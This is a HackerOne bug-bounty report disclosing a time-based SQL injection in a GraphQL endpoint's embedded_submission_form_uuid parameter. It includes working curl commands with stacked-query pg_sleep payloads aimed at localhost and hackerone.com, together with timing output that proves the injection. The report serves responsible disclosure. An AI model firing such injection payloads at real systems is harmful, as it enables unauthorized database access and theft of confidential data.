HackerOne: SQL injection in GraphQL endpoint through embedded_submission_form_uuid parameter

2018-11-06T16:52:08
ID H1:435066
Type hackerone
Reporter jobert
Modified 2018-11-30T01:26:39

Description

The embedded_submission_form_uuid parameter in the /graphql endpoint is vulnerable to a SQL injection. Execute the following command to reproduce the behavior:

Locally: curl -X POST http://localhost:8080/graphql\?embedded_submission_form_uuid\=1%27%3BSELECT%201%3BSELECT%20pg_sleep\(30\)%3B--%27

HackerOne.com curl -X POST https://hackerone.com/graphql\?embedded_submission_form_uuid\=1%27%3BSELECT%201%3BSELECT%20pg_sleep\(30\)%3B--%27

Additional proof $ time curl -X POST https://hackerone.com/graphql\?embedded_submission_form_uuid\=1%27%3BSELECT%201%3BSELECT%20pg_sleep\(5\)%3B--%27 {}curl -X POST 0.03s user 0.01s system 0% cpu 5.726 total $ time curl -X POST https://hackerone.com/graphql\?embedded_submission_form_uuid\=1%27%3BSELECT%201%3BSELECT%20pg_sleep\(1\)%3B--%27 {}curl -X POST 0.03s user 0.01s system 2% cpu 1.631 total $ time curl -X POST https://hackerone.com/graphql\?embedded_submission_form_uuid\=1%27%3BSELECT%201%3BSELECT%20pg_sleep\(10\)%3B--%27 {}curl -X POST 0.02s user 0.01s system 0% cpu 10.557 total

Impact

The SQL injections seems to be executing in the context of the secure schema, so impact is currently unknown. However, since an attacker may be able to switch schemas, we should consider this to have a high impact on confidentiality.